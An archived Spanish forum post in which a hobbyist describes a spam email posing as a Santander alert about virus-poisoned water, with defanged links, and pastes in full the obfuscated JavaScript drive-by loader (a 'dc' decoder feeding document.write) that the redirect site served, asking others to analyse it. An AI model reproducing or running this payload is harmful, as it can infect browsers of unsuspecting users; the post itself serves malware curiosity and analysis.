Virus / vulnerabilidad de navegador

Archivado
Aunque parezca broma, me gustan los virus, los spyware, etc.
No es que me guste estar infectado, pero siempre me han hecho gracia por cómo explotan las vulnerabilidades, cómo se transmiten, cómo engañan a los usuarios...

Así que cuando me llega una carta "de un banco" o algún correo con el asunto de "My girlfriend nude photos!!!!!", siempre echo un vistazo a ver que método han usado esta vez.

La razón de mi post es por que hoy he recibido un supuesto virus que usa un método de infección que no había visto hasta ahora, y que creo que explota alguna vulnerabilidad de JavaScript.

También me ha interesado el hecho que a parte de no contener acentos ni carácteres especiales (la eñe), el correo estaba en perfecto castellano.

Este es el correo (que no viene en HTML, viene en texto sin formato), con los enaces editados para que no se pueda hacer clic en ellos, y los he editado a conciencia por que si alguien quiere usarlos tendrá que currárselo (a su cuenta y riesgo, por supuesto)

Virus Intoxica Agua potable en Espana, informamos a los ciudadanos que no consuman agua ya que contiene un virus debido a un acto terrorista.
Al momento no sabemos la gravedad del Incidente, si sabemos que hay infectados por tomar AGUA INFECTADA CON VIRUS !!
PARA MAS INFORMACION HAGA CLICK EN EL LINK .

h·t·t·p·:·/·/·h·e·a·r·t·-·t·e·c·h·.·b·i·z


Atte.
Ciudadania del Pueblo
Grupo Santander


Si recibio este mail por equivocacione, por favor desuscribirse desde el siguiente link  unsubscribe from our mailing list:
·h·t·t·p·:·/·/·u·n·s·u·b·s·c·r·i·b·e·.·h·-·t·e·c·h·h·r·.·c·o·m


El dominio redirige directamente a otro, concretamente bennyb.cn, que para no alargarme más, usa frames para hacer que al final en uno de ellos se ejecute un HTML con el siguiente código:

<script language=JavaScript>function dc(x){var l=x.length,b=1024,i,j,u,p=0,s=0,w=0,t=Array(63,41,30,7,11,26,57,52,16,58,0,0,0,0,0,0,51,2,15,53,48,18,56,8,43,45,49,38,59,60,29,0,1,21,61,10,12,36,54,25,47,46,62,0,0,0,0,24,0,23,32,50,22,35,3,6,33,40,5,55,27,42,28,44,13,34,4,17,9,14,39,20,31,37,19);for(j=Math.ceil(l/b);j>0;j--){u='';for(i=Math.min(l,b);i>0;i--,l--){w|=(t[x.charCodeAt(p++)-48])<<s;if(s){u+=String.fromCharCode(226^w&255);w>>=8;s-=2}else{s=6}}document.write(u)}}dc("AeYkfS1Uu2iyABGUPmFqw2FkO31yf56qs56qPcTqfAtDA3_eg2FkOf9bfuFbbuFbT3iefgWUO4ny45iySZR7AHFh4diqdZR7neYkEuGUfZiDTuFe3ZpDaA1eO4Tyf9Fy3ZpDS51yEqN@pfFhTcFKOcnbTVM7zkThacGelcoUSSWkf5GyxBpJsS1exeFbwuGDnLN@fS1Uu2iyneYkJgSoHSHIALFbTdFyfdFhxfTqfE6bsgGU4S1yO@p9wuGUAxtUuZpDS51yEqN@pfFhTcFKOcnbTVM7zkThacGelcoUSSWkf5GyxBpDWeu9ieuyfA1Dg2iUEYtKPSMkAxtUuKnJr31UuZpUggWJWeuhac_bdY_eTSni82Fbd2_HSki@A@FcAvt9A4oDA4oDA4TyfA1D8SMkA@Fyu9_Vi4oDA4oDA4oDi4oDA4oDA4oDdA6KAv1D3E6bumnJ8SMkAkG@hA6hf56hIAGq3giyS@FcjXoDxgFbdgiqSxFcWZt9A4oDA4oDA4T9A4oDA4oDA4MqrSocf4TU44nKi4oDA4oDA4oDA4oDA4oDA4oy8Y1DWSMhwuieSaTUA0IDpcni82Fbd2_HOqFhP51cT9oDOfMcjXoDxgFbdgiqSxFcWZt9A4oDA4oDA4Mvi4oDA4oDA4oDi4oDA4oDA4oD4EiDSBoD8YoDWqYDA4oDA4oDA4oDA4oDA4oDdA6KAv1D3E6bumnJ8SMkAkG@hA6hf56hIAGq3giyS@i@AfTDu4TDOXnJ44MvPuiyPmic3YnKxqYDA4oDA4oDA0t9i4oDA4oDA4oD4EiDSBoD8YoDWqYDA4oDA4oDA4oDA4oDA4oDdA6KAv1D3E6bumnJ8SMkAkG@y2iyIAGq3giySfTDu4Te4aMcA0Wbf5WbSmMh4v6vi4oDA4oDA4oDxqYDA4oDA4oDAeYDA4oDA4oDAXGhAHMDAf6cAvt9A4oDA4oDA4oDA4oDA4oDAltUlSnKAxGyf9icjf1Dx4neTa9hdVSbG2_bdmTeu4TDOXnJ44MvPuiyPmic3YnKxqYDA4oDA4oDA0t9A4oDA4oDA4T9A4oDA4oDA4MqrSocf4TU44nKi4oDA4oDA4oDA4oDA4oDA4oy8Y1DWSMhwuieSaTUA0IDpcn135WHOqFhP51cTYnJ44MvPuiyPmic3YnKxqYDA4oDA4oDA0t9A4oDA4oDA4T9A4oDA4oDA4TU356y8cic8YnVA4oDA4oDi0t9izFyTgiy4VGeAa5eSBFcAvt9A4oDA4oDA4TyfA1DsSMkA3SU3uiy3Vmcf9oDOaloPA6qE5tDtfT@OvTDJmGDtfMhOvTDu9GD4vp9A4oDA4oDA4TyfA1DpSMkA3SU3uiy3Vmcf9oDOBm1OvTDIAncOlSiOvTDTfncO3Hy82FbOvTDBAMcWeYDA4oDA4oDAz6b8SMhA0IDscM1TE6q8VGeB2GedmTDcAncOfWeOvTDPAncOx_UOvTDsAMcWeYDA4oDA4oDAeYDA4oDA4oDAz6b8SMetqFhA0IDT21euKp9A4oDA4oDAXuyfA1DOYGeA0ID3cMmd2FeSfoIOvTDvAncO0moOXncAfoXZAoDt4TD4gGqTcMh52GDWeYDA4oDA4oDAz6b8Snysgte5K_VAeYDA4oDA4oDAeYDA4oDA4oDAltUlSnKA0_qG2FkT2_yAHLHYmmydSto3u6y3g1ySXnVA0t9A4oDA4oDA4nbf5WbSmMh44nKi4oDA4oDA4oDA4oDA4oDA4oy8Y1DWSMetqFhA0IDT2_yAB5bdYGy3mlHOqFhP51cO09qPAtDtfneOvTDsVGDtfThOvTDdcoYX9SDtfomOvTDVAncOl4DtfooOXnVA0t9A4oDA4oDA4oDA4oDA4oDA3FbdgiqSxFcAvt9A4oDA4oDA4oDA4oDA4oDA4oDA4oDA4oDBKGq3SMkA@FhQSMiP56qw2iYIAGq3giySfMHOvTDJAncOH4DtfMHYAp@J2GUOvTDw2GU9ZmHOvTDm5HIcAMcWeYDA4oDA4oDA4oDA4oDA4oDxqYDA4oDA4oDA0t9A4oDA4oDA4T9A4oDA4oDA4MqrSocf4MetqFh44TU356y8cicEXnVi4oDA4oDA4oDA4oDi4oDA4oDA4oDBKGq3cneE2GeSfn1v54Du4oh3S1UlqWbu4Thf9_U3YT9A4oDA4oDA4MetqFhT36hT5icT21euYnVi4oDA4oDA4oDQgWUTmWqA0IDBKGq3cTU3g1Upc_U3A5egYWVi4oDA4oDA4oDi4oDA4oDA4oDpcoIlS6hA0IDzvp9A4oDA4oDA4neT05eg2iDx4n7WeYDA4oDA4oDAkG@IS6hTmMcWeYDA4oDA4oDAkG@CA6qd2icQgWUTmWq4vp9A4oDA4oDA4neT3Lbw2iIpE9qu2icOYGeu4T74vp9A4oDA4oDA4oDA4oDA4oDA4oDA4oDi4oDA4oDA4oDscToacicOYGeu4RcWeZvieuyfA1D4SMkA4NViz6b8STKG2tedA6hA0IDT2_yABSU8uFKSfnKb59Vw39COvTDazR@wfncOxpDtfMis0M7zfncOlm7BXIVsB9@E4NiElpDtfT1OvTDhApDtfMVOvTDvgpCOvTDxAo@OvtiKYpCh2RCOvTDwfncO0TCOvTDafncOBSDtfn7BBR7KSR@lfncOHpDtfn7OvTDeAncO0o7OvTDEfncO3SDtfo7dz5i8XR1OvTDsfncOzpDufnKOvTDeAncOf9VOvTDbAncO3SDtfM1K5SDtfM@vAncO35CvZoCQx97BfncOXpDtfn78fR@KAncOlpDtfMiOvTD8BI7wBNCzBpCOvTDxAo@Ov17OvTDEfncO4pCUSN7s0o7E4I7B4I7E4R@hSI7OvTDE0o7E4I7E4I7E4I7dfncOzRvOLTDWSpDtfo7OvTDEzp1OvTDE3RiB4I7E4R@E4I7E0niE4I7B4I7OvTDE4I7E4I7E4ICwfo@OvtC3gp7EapDtfo7fZTDtfnCOvTDwfncOzIhBlRh3ER@5aRVPZohPuphOvTDfAncOXR7gAphPgpDufnKwfncOlpDtfM7OvTDdfncOxpDtfM78f9@bYNCOvTD5fncO0oCaBI1BfncOBSDtfo7KmR@OvTDUgS1OvTDKAncOzSDtfn7OvTDsxmVs3NiOvTDxAo@OvWCU2pDtfTiOvTDQfncOzSCs0T1Ezp1BlN7OvTDsfncOBpDtfM@OvTD5BS7w0TDtfn7sXR1E3NiEB91sfncOlSDtfMvOLTDWAncO4pDtfTCOvTDQfN7vSpDtfMVOvTDBzmChAR@OvTDdfncO3Nb50oVsfncOxpDtfoVB4RVUgSDtfo1zlSiEapCw0tDufnKOvTDwfncO3pDtfMVUdp7az9@zfS7KZTDtfoCOvTD5fncO3pDtfM7BB9VU59@OvTD5aIC5fncOlpDtfnCwHp7EBI7xAo@OvtieSR75xRVl0M7KA57BlICrAncOXpDtfM@53pid0oCwfncOBICalNi5lpiUmRvOLTDWAncOlm7hSNCK2pCBaNiwXR@d3p1zfncO0TDtfTidBm7BfRCU2RizBp1eA97OvTDl0tDufnKOvTDvAncOHpDtfniOvTDhgm1KESDtfM@huS7OvTD5fncO0oCOvTDlfncOzpbBfm7OvTDa4R@w3m7OvTDQfncO3SDtfMVOvTDwfncOfpDtfoCOvTDQfncOzpDtfTiOvTDxAo@T21euYnVi4oDA4oDA4oDia1q49FhAHTKG2tedA6h6YFX44nKi4oDA4oDA4oDA4oDA4TyfA1DfSMkA@Fyu9_Vi4oDA4oDA4oDA4oDA4oDi4oDA4oDA4oDA4oDA4MqrSoc_qFyT5tU3KLq0cnUaA_UdA6qTdicELM744Mkx4nJWdMcAvt9A4oDA4oDA4oDA4oDA4oDA4oDA4oDfSMkAl_eP26e3ciyT3GU3uiy32me3ZFhT51cOkGbG2GDtfnbOvTDdAMcWeYDA4oDA4oDA4oDA4oDA4oDA4oDA4oDfcnU356id5tU4AFyd2icO3iefgtDtfnU4AncOlGDu4TDPAncOLGDtfnU4AncOlGVO4ncAetqaciy82_Y4Z4@s2tbs5tU4c_hSBI@Aetqaciy82_Y4Z4@u2Gej51qA0oDzXMcWeYDA4oDA4oDA4oDA4oDA01D39_U3SnKi4oDA4oDA4oDA4oDA4oDA4oDA4oDAltUlSnKABiDx4Te3d1Degiy4E6h9VSbG2_bdmTKG2tedA6h6YFX4vIDxSnbf5WbSmMh4v6vi4oDA4oDA4oDA4oDA4Mvi4oDA4oDA4oDA4oDA4oDi4oDA4oDA4oDA4oDA4oD4EiDSBFcAvt9A4oDA4oDA4oDA4oDA4oDA4oDA4oDAltUlSnKA4oDA4oDA4oDA4T9A4oDA4oDA4oDA4oDA4oDA4oDA4oDA4oDA4oDA4TyfA1DOSMkA3SU3uiy3Vmcf9oDOa4DtfnoPAtDtfMqOvTDEAncOltDtfT@JmFhuAncOLGD4vp9A4oDA4oDA4oDA4oDA4oDA4oDA4oDA4oDA4oDA4oD4EiDSfFcAvt9A4oDA4oDA4oDA4oDA4oDA4oDA4oDA4oDA4oDA4oDA4oDA4oDAa5eSBFcWeYDA4oDA4oDA4oDA4oDA4oDA4oDA4oDA4oDA4oDA4oDA4oDA4oDpkTU356y8cicEXnVi4oDA4oDA4oDA4oDA4oDA4oDA4oDA4oDA4oDA4oDA0t9A4oDA4oDA4oDA4oDA4oDA4oDA4oDxSnbf5WbSmMh4v6vi4oDA4oDA4oDA4oDA4oDA0t9A4oDA4oDA4oDA4oDAX_ctvp9A0t9ieu9iz6b8STeE5_UaKiUA0IDaA1etaTJsS1exzFqjvp9wuGUABShjg6iD5WhA0IDEH17PSNbE3i7PKp9wuGUAkGe_SWbA0IDjanVieuhpA1DSXiDx4o7W4MqALIDTS1hs2WqEcoe3c_hdm_VAXoDivt9pcGKEgiDt0IDjxMyj4ncAHoc4KM72@iUgg6ytSt@u2Gej51q4kpeE5_UaKiUT3iqfAWip5Fhe51c4KM74@oypgHy8YGejmM7wXTVj4I7jXncTS1hs2WqEcnbSuGUhVih3umySXFcTlWeJ5tU4c_hSBpC4vp94SMkAXiDt4T7WeZvHeu9A4oDA4oDA4Tbjdihg2_y8EiDx4MyT2_UPuiU3mnJ3x6VEXI73x6VEancjXI73x17r2Gb3xW7sxpb3xtCw3FV3x1VEfFV3x1VE4R73x6hrgN73x6h8lN73x6hOEFb3x6h54RC3xthr2_b3xthrEGh3ancjx1VOdph3x1hr5Rh3x6hr2Gh3xtCdxGh3x6hsBGh3x6VrEIC3x1C8z_73x6VrEIC3xtC32_C3x6hrSN73x6hr2Gb3xtCdxGh3xtbl4N73xtCzHNC3x6hzBF73x17Q4N73x6hruR73x6hr2Gh3x6bfEpC3xtblxGb3xWCQHNC3xtCaBR73x17QxF73x6hruph3x6hr2Gh3x6bfEpC3xtblx_C3xWbfmNC3x67Exph3x17QfIh3x6hrSIh3x6hr2Gh3x6bfEpC3xtblx_73x17EHNC3x17rAR73x17QHph3x6hrgpb3x6hr2Gh3x6bfEpC3xtblzGh3xt73mNC3x17fdncjXpC3x17QxNC3x6hrARV3x6hr2Gh3x6bfEpC3x6brEGb3x1hQancjzph3x6VfANb3xtCwBRC3xthQBFb3x6h54pC3x6hr2Fh3xtbzxGh3x6VfEpC3xtCd3Gb3x6hOuFb3x6h3mRC3xtCdfGC3xthQfFb3x17QfFV3x6hrEIC3x6hr2Gh3x1VQfGh3xthalFV3x6Vrgi73xWC54NC3x6hr2Gh3xtCwxGh3xthsBFb3xt7fEIC3xt7rENb3xtCwfGh3xWbruFb3x67EHNC3x6hr2Gh3xtbr2Gh3x6bfEIC3x1VazGb3xtbwxih3xtbfEIC3x17Qz_C3x6hrmRh3x6hr2Gh3x6bf2_b3xt753Gh3xtbsxGh3xWbzXR73xt75HRb3x6hOuGh3x1VfYNC3x6hr2Gh3x6VfuI73xtCd3Gh3x6hsBFb3x6h3mRC3xtCdfGC3xthQfFb3x6brSNC3x6hr2Gh3ancjx1VaxGh3xtbQxiV3x6bf2_b3x1hPgGb3xtbPgIC3x67Ef_b3xWbrYRb3xtbPAGh3x6bfEIC3x1Vaz_73xtbwxFb3xtbfEIC3x17Qz_JtanC3x6hrg_b3x6hr2Gh3x6hrmRC3x6VfuI73xtCd3Gh3x6hQBFb3x6hgmRC3xtCdfGC3xthQfFb3xthrSNC3x6hr2Gh3x1VaxGh3xtCdBI73xthruFb3x6h3mRC3xtCdfGC3xthQfFb3x6hrSNC3x6hr2Gh3x6b32Gh3xtbgAiC3x1732_b3x1732_b3x1732_b3x1732_b3x17szNb3xtbaxGb3xtCdf_b3x17ggRC3xtbguIV3x17ruI73xtCdfFb3xtCd4N73x6hQXp73xtb8zIC3xtblx_73x6VPEIC3xtCdl_73xthzXpb3x6hPYNC3xtblBNb3x6VlzIC3x6hPgGh3x1hPuNb3x6bwfpC3x1C8BFh3xt7P2_b3x1hPAFV3x6hEBRV3xthr2R73x67g5FC3x6hQXpb3xt7zfRh3x6hP2G73x6bruIh3x673SIC3x67zliC3x6VfAF73xtba4Rb3x17dzIC3xtbazIC3x6hPgGb3x1Vl3p73x6hszIC3xtCdBiC3xthsfFC3xW78x_b3x6hOEIC3x6hPEIC3xWJtaTbzfRb3xt7gAG73x6hr2_C3x67OSNC3x67EBR73xtbfuI73x6bsfih3x6bEBG73x6hruF7jXnViXZh856KA0IDacFhsgFbE2icpcGKEgFcWeZ9wuGUAe1Kzg6y4SMkAf_hj5ih3dtUrKMh856KWeZ9wuGUAHFqdVGUzYGK3SMkA4IKd4I7E4I7WeZ9wuGUAlFhsA1yrd_qA0ID_m6Us26qTLFhTdiySSTcAfNViXuyfA1DguWyJYGK3SMkAHFqdVGUzYGK3SM@AHoh3gtUdE_htKo75gIV4vp9Hz6b8Sohzd1Dx4MyT2_UPuiU3mTD3x17PSNb3x17PSNbOXnViXYhzd1Dx4nh351hzd1cguWyulFUQgLq_2FcWeZ9SYiypA6UA0IDSBShjg6iD5WhA0oDEH1CE4I7E4RcpHFqdVGUzYGK3Kp9H0FhBVGUlSMkA@FhQSMi8A6blmMcWeZ9rVGUAHMqx4NV49Iq45We8uWV4Knc4eZ9WqZ9H0FhBVGUlKLq0SMkAlFUQSncAe1Kzg6y4Kp9H0t9Hz6b8SnhpE1Dx4nJjvp9Hz6b8SnUA0IDjVGyWeZ9sSncx4o75dphrEGhrEFhWeYDA4M9rVGUAHoD4SMkA4IDW4MqALID8xpCAvID4Knc44T9Hvt9HXYy8YWKAeZ9HXuyfA1DjSMkA@FhQSMiP56qw2iYIAGq3giySfnI3AGI42_yUAncOkieg2GUHg_eOvTDTAncO@TDtfnIOvTD3AncOfGDtfTI4AncOx_yUVieOvTDg2GUHg_eTcM7OXnViXZ9HaG@s2iyJ9FqP2ics9oDeE_hsuSoddi@ABShjg6iD5Whu4Mird_UeAHyjSMcW4T9HXZvPuiyPmic3YnKxqZ9xqu9HzFyTgiy4VGeAaFhd5FUQmohzd1@AlFUQgLq_2FciX2KiXZ9QmFqu2iDSlFUQcoe3c_hdmGc8LIhzdWo4q6h4eZ9Hvt9HXZ9guWyAvMkAlFUQKp9HXZviXZ9guWyA0IDguWyT36yOg1y8YGejmo7ulFUQgLq_2_@8XnViXZ982iyaAteAlFUQKp9H0t92knUPA6qE5tk")</script>


Este javascript ejecuta la función dc, que decodifica ese chorro de datos del final de la línea. Creo que ahí es dónde reside el virus, pero por suerte Firefox no devuelve ningún resultado, con lo que por una parte me confirma que es un virus que seguramente usa una vulnerabilidad de JavaScript, y por otra que para variar la vulnerabilidad está en el Internet Explorer.

¿Alguien por aquí que sepa algo de JavaScript que pueda analizar un poco el código? Es que yo sólo llego hasta dónde he indicado, y me interesa el tema por curiosidad.

Incluso, si esto es tan novedoso como me parece, podríamos ser los primeros en reportar el incidente a Symantec o a quien toque.
0 respuestas
Archivado
Volver a General